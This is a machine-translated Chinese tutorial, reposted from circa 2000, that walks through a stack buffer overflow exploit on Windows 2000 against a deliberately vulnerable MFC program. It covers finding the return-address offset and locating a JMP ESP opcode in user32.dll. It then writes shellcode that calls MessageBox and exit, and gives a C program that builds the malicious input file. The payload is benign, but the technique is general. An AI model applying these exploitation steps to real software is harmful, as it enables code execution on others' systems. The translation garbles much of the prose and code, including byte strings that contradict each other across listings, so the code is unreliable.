Windows 2000 buffer overflows

zhaozj2021-02-16  92

Windows 2000 buffer overflows

Original: jason

Translation / finishing / adaptation: Backend

April 12, 2000

- [Foreword

I have read many articles about buffers overflow on the Internet. Among them

The number is based on the * NIX operating system platform. Later, I worshiped my IPXODI.

"Stack overflow under the Windows system" (already published in the Green League Network Security Monthly 2000

In the third phase of the year, I happened to see Mr. Jason

"Windows NT Buffer Overflow's from Start To Finish",

Thanks to a lot. During the translation of Mr. Jason's article, because my machine is installed.

Windows 2000 Server, discovers the details slightly in the debugging of the original text.

Therefore, the relevant source programs, dynamic link libraries, and offset provided herein are in myself.

Debugging on the machine is accurate. (For different versions of dynamic link libraries, the programmer needs to be debugged.)

This article should be entry level. Although it is relatively simple, it is slow to slow down

The rush spillage has a certain versatility. For example, the stack overflow address determines, jump instruction

Find and use, overflow the writing of the execution code, and so on. Just find the Windows system

There are programs in the buffer overflow vulnerability, basically through these steps.

But as IPXODI is pointed out, because the version of the dynamic link library in Windows is updated faster,

Be sure to debug according to the actual platform of the programmer. Release this type of security vulnerability announcement or overflow

When an attack program, the source code, system platform, and dynamic link library should be as best as possible.

Columns are clear. Otherwise, others may be very powerful. ;)

- [debugging, test environment

Microsoft Visual C 6.0

Microsoft Windows 2000 Server (Chinese, internal version number: 2195)

- [debugging, testing process

First, write an application where there is a buffer overflow vulnerability. This program can read files

Content, so we can overflow the program by modifying the content read files. ;-)

Create a new console application in the Visual C development environment,

Select "An Application That Supports MFC" and click "Finish".

(Note: In fact, it is not necessarily the MFC application, but it is my own habit.

Yes. ;-))) Add some necessary code to this application, as follows:

CWINAPPPP;

Using namespace std;

Void overflow (char * buff);

Void Overflow (Char * BUFF)

{

CFILE FILE;

CfileException ER;

If (! file.open (_t ("overflow.txt"), cfile :: moderad, & er))

{

Er.ReportError ();

Return;

}

INT x = file.getlength ();

File.read (BUFF, X);

}

INT_Tmain (int Argc, tchar * argv [], tchar * envp [])

{

INT nretcode = 0;

// Initialize MFC and Print and Error On Failure

IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))

{

// Todo: Change Error Code To Suit your NeedscerR << _T ("Fatal Error: MFC Initialization Failed) << Endl;

NRETCODE = 1;

}

Else

{

CHAR BUFF [10];

Overflow (BUFF);

}

Return nretcode;

}

Now let's analyze the above C code, find a vulnerability. this is

An MFC console application, "main" function is different from other programs, but work

The mechanism is basically consistent. We mainly analyze the "else" code in this function. The first is the first

"CHAR BUFF [10]" defines a 10-character long local variable. we all know,

The memory space of the local variable is allocated in the stack. (If you don't even know this, build

Don't continue to look down. :)) Then call the buff variable as the parameter Overflow

function. Ok, let us analyze the Overflow function. The first is a CFILE object,

It is a cfileException object. Next, try to open the current directory by reading permissions.

The file "overflow.txt". If you have successfully, read all the contents of the file

Take the buff array variable. Discover the problem? BUFF variables are only 10 characters long. in case

What happens when reading the content length of 100? Yes, "buffer overflow"!

And the buffer overflows occurred in the stack. It can be seen in the latter test.

What can I do with this vulnerability! ;) Now let's create a text file "overflow.txt",

And put it in the Project directory of this application.

Let us discuss the memory structure of Windows NT / 2000 before proceeding.

Each process of NT / 2000 is assigned a 4GB (0xFFFFFFFF) virtual memory at startup.

Some of these parts are actually shared by all processes, such as cores and device drivers.

area. But they are all mapped to virtual address spaces for each process. Actually don't enter

The process is assigned to the 4GB of physical memory, but only the physical memory is allocated only when needed. So every one

The process has its own 4GB virtual memory, and the address range is from 0x00000000 to 0xFffffFFF.

Among them, 0x00000000-0x0000FFFF is allocated to NULL pointer. Access to the area

Domain memory will result in an "illegal access" error. 0x00010000-0x7ffefff is a user process

space. The image of the EXE file is loaded (start address 0x00400000), DLL (moving)

Status link library) is also loaded into this space. If the code of the DLL or EXE is loaded into this field

Some addresses can be executed. Access the address that there is no code loaded in this area will guide

To "Illegal Access" errors. 0x7fff0000-0x7fffffff is a reserved area, for this area

Any access will result in an "illegal access" error. 0x80000000-0XFFFFFFF only for

The operating system is used. Used to load device drivers and other core level code. From user-level

Access this area using a program (Ring 3) will result in an "illegal access" error.

Now return to the "overflow.txt" file. Now we will constantly add this text file.

Plus characters until the system dialog box that is illegally accessed by the application. Here, what is filled?

Characters are very important (the reason will be known). I chose lowercase letters "a" to fill

Text file. We already know that the buffer is only 10 characters long, then fill 11 characters first. (Note: Compiling applications in DEBUG, otherwise the result may vary.)

no response. We continue to fill characters ... until 18 characters apply to crash.

But this crash is not much for us. Continue to fill! When the string length is 24,

The dialog box information of the pop-up is observed: "0x61616161" instruction is referenced "

0x61616161 "Memory. This memory cannot be" Written "." I think everyone should

What is the ASCII code represented by "0x61"? ;) If your machine is installed

Visual C , click the "Cancel" button to debug the application. Enter the debugging environment

After selecting the "View" menu - "Debug Windows" - "Registers",

The register window can be opened. If you are not in charge of compilation, it is recommended to find the book to see the book.

Look. The contents of registers such as EAX, EBS, and EIP are seen in the register window. EIP is of course

The most important thing. The content of the EIP is the address of the program to perform instructions next step. We note

It means that the value of the ESP register is not damaged, and it seems that it is not far from our BUFF variable. Next

Step We need to find the value of the ESP is from how to deal with it.

It will be complex now (this is the source of fun! :)). In the main function

The last line code sets a breakpoint because we only care about what happened here. Now

Move the debugger and let the program have no trouble to run the breakpoint. Then switch to the anti-assembly window (press

Alt 8, or click "View" - "Debug Windows" - "Disassembly").

Also open the memory window and register window.

0040155B 5F POP EDI

0040155C 5E POP ESI

0040155D 5B POP EBX

0040155E 83 C4 50 Add ESP, 50H

00401561 3B EC CMP EBP, ESP

00401563 E8 7E 00 00 00 Call _chkesp (004015E6)

00401568 8B E5 MOV ESP, EBP

0040156A 5D POP EBP

0040156B C3 RET

What is these things? Assembly code. If you don't understand the compilation, I am here.

Do some simple instructions. The first line is "POP EDI". Directive POP is used to pass only in the stack

The top data moves to the subsequent subsequent registers. It should be noted that the ESP register. ESP is

32-bit stack pointer. A POP instructions move a data unit at the top of the stack, here is here

DWORD (double word, 4 bytes), in the specified register, and add the stack pointer 4 (due to co-move

Moved 4 bytes). Let's take a look at the ESP register before performing the next step. In the memory window

Enter the ESP to get the address and content of the current pointing to the ESP. Look at the memory pointing to the ESP

The content of the 4 bytes of the address and the contents of the EDI register. Now, "POP.edi" is now executed.

We can see the value of the memory address pointed to the ESP in the EDI register, while ESP

The value also increased by 4. The following two instructions are the same, but the registers are different. Single to perform them. The three-way instructions followed by this article did not make sense, so they did not explain here.

Single step to the instruction "MOV ESP, EBP", which assumes the value of the EBP to the ESP register.

Then the command "POP EBP", which is important. Let's enter ESP in the memory window.

You can see that the memory address has a string "0x61" (the 16-enabled value of 'A'). therefore

0x61616161 will be popped up to the EBP register. Single-step execution This instruction can be tested.

Wrill? ;) Ok, although I said it is right, but it seems that we haven't obtained any useful

thing? Now, the last instruction "RET" is now. The command "RET" is returned in the assembly

make. How do it know where to return? Value from the top of the stack

set. This command can be represented as "POP EIP if used by the POP instruction."

You can't execute this POP directive;)). It pops up 4 words from the ESP pointing to the memory address

The contents are given to the EIP register (the EIP register is a 32-bit instruction pointer). This means that

Regardless of which memory address is pointed to the EIP, the command will always be the next instruction. I

We will enter the ESP again in the memory window, see instructions that will be assigned to the address of the EIP register

What is it. In fact, I would like to know that you should know the 0x61 string of 4 words. Let me now

We will perform the instruction in step, see the value of the EIP is 0x61616161, which means the next command address.

For 0x61616161, but the instruction is displayed as ??? (meaning invalid instruction). Therefore, then single step

The instruction will result in an "access illegal" error. Now look at the ESP register. It correctly points correctly

The next value in the stack. That is, the next step is to determine the success of the buffer successfully overflow.

When (EIP = 0x61616161), whether the address pointed to by the ESP can store our overflow.

Code! We add 4 'a' again in the overflow.txt file, and a total of 28 'A').

And debug the program again, observe the memory window and register window when executing to the "Ret" instruction.

Will find that the content of the ESP points to the memory address of the ESP is 4-byte length 0x61 string after executing the "RET" instruction.

Great! what does this mean? ! Let everyone want to go. ;)))))

Now I will go back and analyze it. We just used characters 'a' (0x61) as text

Fill content of files to determine that there is a buffer overflow. Due to EIP = 0x61616161, when I

When the program accesses the instruction attempt to access the address, it is caused by an invalid instruction.

Unveiled. But what if the address pointed to the executable code? For example, loading

Save DLL code, etc. Haha, this will execute these instructions, so that some don't do something else.

People can't imagine! ;)

Ok, so far, we can control the value of the EIP, and you know the stack points to the ESP.

Location, and can write any data to the stack. So what is the next step? Of course you find

Make the system performs our overflow code. If you have seen the article in IPXODI

"Stack overflow under the Windows system" will know that the jump instruction (JMP ESP) is

It's best. The reason is not more, please read carefully.

"Stack overflow under the Windows system" is clear. As analyzed in front, this is because the ESP can point to our overflow code after executing the RET instruction! (... oh, can't find it,

I haven't analyzed it? In this article, look for words "great", huh, huh. Now we have to

The address of the application is found to find the address containing the "JMP ESP" instruction. First of all, is of course it is

The machine code of this instruction is set. How to determine? Do you have to teach this? Ok, teach it. Only

Once, no violation. ;) Actually, it is very simple, follow these steps. First

Create a new application in Visual C . (Of course, the console program, or support

MFC, this is my habit. Ha ha. Enter the following code:

CWINAPPPP;

Using namespace std;

INT_Tmain (int Argc, tchar * argv [], tchar * envp [])

{

INT nretcode = 0;

// Initialize MFC and Print and Error On Failure

IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))

{

// Todo: Change Error Code To Suit your Needs

CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL;

NRETCODE = 1;

}

Else

{

Return 0;

__ASM JMP ESP

}

Return nretcode;

}

The next step is how to find this string machine code in our process space. It is also very simple, as long as

Modify the code:

CWINAPPPP;

Using namespace std;

INT_Tmain (int Argc, tchar * argv [], tchar * envp [])

{

INT nretcode = 0;

// Initialize MFC and Print and Error On Failure

IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))

{

// Todo: Change Error Code To Suit your Needs

CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL;

NRETCODE = 1;

}

Else

{

#if 0

Return 0;

__ASM JMP ESP

#ELSE

BOOL WE_LOADED_IT = FALSE;

Hinstance h;

TCHAR DLLNAME [] = _t ("user32");

H = getModuleHandle (DLLNAME);

IF (h == NULL)

{

H = loadingLibrary (DLLNAME);

IF (h == NULL)

{

Cout << "ERROR Loading DLL:"

}

WE_LOADED_IT = TRUE;

}

BYTE * PTR = (byte *) h;

Bool Done = false;

For (int y = 0; "DONE; Y ) {

Try

{

IF (PTR [Y] == 0xFF && PTR [Y 1] == 0xE4)

{

INT POS = (int) PTR Y;

COUT << "opcode found at 0x" <}

}

Catch (...)

{

COUT << "end of"

}

}

IF (WE_LOADED_IT) FREELIBRARY (H);

#ENDIF

}

Return nretcode;

}

Maybe you will be strange, why not use kernel32.dll? Is it more common? I just started

It is also the process space of the dynamic link library Kernel32 to find "FF E4", but actually

Can't find! (Found at least 6 in Windows NT 4 !: (() later I tried

User32.dll is found and finally found. Running program output:

Opcode Found AT 0x77E2E32A

End of user32 memory reached

Note that different dynamic link libraries and versions may be different. My dynamic

Link library User32.dll version is 5.00.2180.1. Now use 16 credit editor

(Such as Ultra Edit) Open Overflow.txt text file, starting in the 21-character position

Into 2A E3 E2 77. (Why is it in the 21st character position? Why is you input?

2A E3 E2 77? I don't want to explain, if you can't understand this, I suggest you don't study again.

The buffer overflows! We first keep the four 'A' characters behind. Use debugger running

The order, execute it to the "RET" command to see if the next instruction is "JMP ESP",

Moreover, whether the content of the ESP before "JMP ESP" is 0x61616161. If everything is correct,

Ok, so far so good.;) Let's make more exciting things - write buffer overflow

Out of execution code.

First, you must ensure that all required dynamic link libraries are loaded into the process space. A kind of party

The method is the dynamic link library that uses the program itself; another method is loaded in the overflow code

This dynamic link library. (Detalated between IPXoDi's "Stack overflow under Windows System"

Shao. I use the first method here. why? Because it is simple. ;)

Oh, in order to program the simple, the main purpose of this article is to teach, the focus is the principle, so

The code is only popped up when the code is executed. If you want to write more aggressive or more complex execution

Code, you can refer to IPXoDi "Stack Overflow under Windows System" and Green Corps

"Advanced Buffer Overflow". However, the consequences are at your own risk!

First we have to find how to call the MessageBox function in your code. WINDOWS API

Set, MessageBox depends on user32.lib, that is, it is located in user32.dll dynamic link

In the library. Start the Depends tool, open the application that will be overflow, you can find it will add

User32.dll. Then look for the memory location of the Messagebox function. In my machine

In user32.dll, the offset of the MessageBoxa (ASCII version) function is 0x00033d68. User32.dll's starting address in memory is 0x77df0000. Phase

Adding an absolute memory address of the Messagebox function is 0x77E23D68. So we need

Set the stack correctly in the assembly code and call 0x77E23D68. Based on Steve Fewer

WINAMP buffer overflow code learning and research, the assembly code I wrote is as follows:

Push EBP

Push ECX

MOV EBP, ESP

SUB ESP, 54H

XOR ECX, ECX

MOV BYTE PTR [EBP-14H], 'S'

MOV BYTE PTR [EBP-13H], 'u'

MOV BYTE PTR [EBP-12H], 'C'

MOV BYTE PTR [EBP-11H], 'C'

MOV BYTE PTR [EBP-10H], 'E'

MOV BYTE PTR [EBP-0FH], 'S'

MOV BYTE PTR [EBP-0EH], 'S'

MOV BYTE PTR [EBP-0DH], CL

MOV BYTE PTR [EBP-0CH], 'W'

MOV BYTE PTR [EBP-0BH], 'E'

MOV BYTE PTR [EBP-0AH], ''

MOV BYTE PTR [EBP-9], 'G'

MOV BYTE PTR [EBP-8], 'O'

MOV BYTE PTR [EBP-7], 'T'

MOV BYTE PTR [EBP-6], ''

MOV BYTE PTR [EBP-5], 'I'

MOV BYTE PTR [EBP-4], 'T'

MOV BYTE PTR [EBP-3], '!'

MOV BYTE PTR [EBP-2], CL

Push ECX

Lea Eax, [EBP-14H]

Push EAX

Lea Eax, [EBP-0CH]

Push EAX

Push ECX

MOV DWORD PTR [EBP-18H], 0x 77E23D68

Call DWORD PTR [EBP-18H]

MOV ESP, EBP

POP ECX

POP EBP

The above assembly code will call the MessageBox function located at 0x77E23D68 so that it pops up the title

"Success", the message content is the message box of "We got it!". I have to pay attention, I

We can't use 0 (null) as characters in a string, please refer to IPXoDi

"Advanced Buffer Overflow" and Green Corps under Windows System. Now

In addition, we have to get the machine code of these assembly code. The method has been introduced earlier and no longer repeat.

The machine code that is finally organized is:

/ X55 / X51 / XEC / XEC / X33 / XC9 / XC6 / X45 / XEC / XD / X75 / XC6 / X45 / XEE / X63 / XC6 / X45 / XEF / X63 / XC6 / X45 / XF0 / X65 / XC6 / X45 / XF1 / X73 / XC6 / X45 / XF2 / X73 / X88 / X4D

/ XF3 / XC6 / X45 / XF4 / X57 / XC6 / X45 / XF5 / XF6 / X20 / XC6 / X45 / XF7 / X47 / XC6 / X45 / XF8

/ X6F / XC6 / X45 / XF9 / X74 / XC6 / X45 / XFA / X20 / XC6 / X45 / XFB / X49 / XC6 / X45 / XFC / X74 / XC6 / X45 / XFD

/ x21 / x88 / x4d / xfe / x51 / x8d / x45 / x-x50 / x8d / x45 / xf4 / x50 / x51 / xc7 / x45 / xe8 / x68 / x3d

/ XE2 / X77 / XFF / X55 / XE8 / X8B / XE5 / X59 / X5D

If this is now entered into the overflow.txt file, it will be able to overflow, and we will pop up.

System box. But when you click the "OK" button, the application will crash. To avoid this

The situation, we need to call the EXIT function to close the program normally. Check out the Windows API documentation,

It is necessary to import MSVCRT.LIB, so it is sure to be in the MSVCRT.DLL dynamic link library. Use Depends

It is because our application will be discovered by the application.

The program is now used is a debug version. But there is not much difference. MSVCRTD.DLL starts in memory

The start address is 0x10200000, and the EXTRY POINT is 0x0000af90, then

The absolute address of the EXIT function is 0x1020af90. Therefore, the assembly code is:

Push EBP

Push ECX

MOV EBP, ESP

SUB ESP, 10H

XOR ECX, ECX

Push ECX

Mov DWORD PTR [EBP-4], 0X1020AF90

Call DWORD PTR [EBP-4]

MOV ESP, EBP

POP ECX

POP EBP

The above code calls the EXIT function with 0 to the parameter, so that the application runs out with code 0. Be sorted

The machine code is as follows:

/ X55 / X51 / XEC / XEC / X33 / XC9 / X51 / XC7 / X45 / XFC / X90 / XAF / X20 / X10 / XFF / X55 / XFC / X8B / XE5 / X59 / X5D

The above two string machine codes are now entered into the overflow.txt file (starting at the 25th byte.

Don't ask why this time? ! If you still don't understand, review the previous content!)

If you are troublesome, you can use the following procedure (how, enough friends?;)):

CWINAPPPP;

Using namespace std;

INT_Tmain (int Argc, tchar * argv [], tchar * envp [])

{

INT nretcode = 0;

// Initialize MFC and Print and Error On Failure

IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))

{

CERR <<_T ("Fatal Error: MFC Initialization Failed) << Endl; Nretcode = 1;

}

Else

{

Char buffer [20];

// 0x77e2e32a //user32.dll JMP ESP

CHAR EIP [] = "/ x2a / xe3 / xe2 / x77";

Char sploit [] = "/ x55 / x51 / x8b / XEC / x83 / XC9 / XC6 / X45 / XEC / XEC / XEC6 / X45 / XED / x75 / XC6 / X45 / XEE"

"/ x63 / xc6 / x45 / x45 / xf0 / x65 / xc6 / x45 / xf1 / x73 / xc6 / x45 / xf2 / x73 / x88 / x4d / xf3 / xc6"

"/ X45 / XF4 / XF5 / XC6 / XC6 / X45 / XF6 / X20 / XC6 / X45 / XF7 / X47 / XC6 / X45 / XF8 / X6F / XC6 / X45"

"/ XF9 / X74 / XC6 / X45 / XFA / X20 / XC6 / X45 / XFB / X49 / XC6 / X45 / XFC / X74 / XC6 / X45 / XFD / XFE"

"/ X51 / X8D / X45 / XEC / X50 / X8D / X45 / XF4 / X50 / X51 / XC7 / X45 / XE8 / X68 / X3D / XE2 / X77 / XFF / X55 / XE8 / X8B"

"/ XE5 / X59 / X5D / XEC / X83 / XEC / X10 / X33 / XC9 / X51 / XC7 / X45 / XFC / X90 / XAF / X20 / X10 / XFF"

"/ x55 / xfc / x8b / xe5 / x59 / x5d";

For (int x = 0; x <20; x )

{

Buffer [x] = 0x90;

}

CFILE FILE;

File.open ("overflow.txt", cfile :: modecreate | cfile :: modewrite;

File.write (buffer, 20);

File.Write (EIP, Strlen (EIP));

File.write (sploit, strlen (sploit);

File.Close ();

}

Return nretcode;

}

After ensuring that the content and position of all files are accurate, run the overflower .......... Haha, our

The message box is coming out! ! ! Click the "OK" button, the program is turned off! ! !

- [Post "

Recently visited foreign security sites, hacking sites, found more and more attention to the security of Windows systems,

It is also growing more and more, including L0PHT, Cerberus, etc. Especially in some hackics

A strong stack of attack programs for Windows 9x / NT / 2K. I really can't imagine, such as

If Micro $ OFT discloses all Windows source code, how many security vulnerabilities are discovered. And I think, according to the country

The universality of the Windows platform is used, and the problem will be more serious. So I think the security of Windows is in China.

Sexual research should be more tight! Although the actual situation is frustrating ... :(

This article is not intended to organize it, because I have just started researching the buffer overflow under the Windows system.

Out, there is not much thing, worrying is laughing by the WINDOWS master. Later, I figured it out: only ""

"Make the ax" can you know your shortcomings, you can make progress faster. I hope that the WINDOWS masters will give more advice. It is the security of the IPXODI, Yuan Ge, Zer9, etc. in our green corps.

Experts, if this article can play the role of "throwing bricks", I am very satisfied.

<<< Finished >>>

转载请注明原文地址:https://www.9cbs.com/read-11931.html

New Post(0)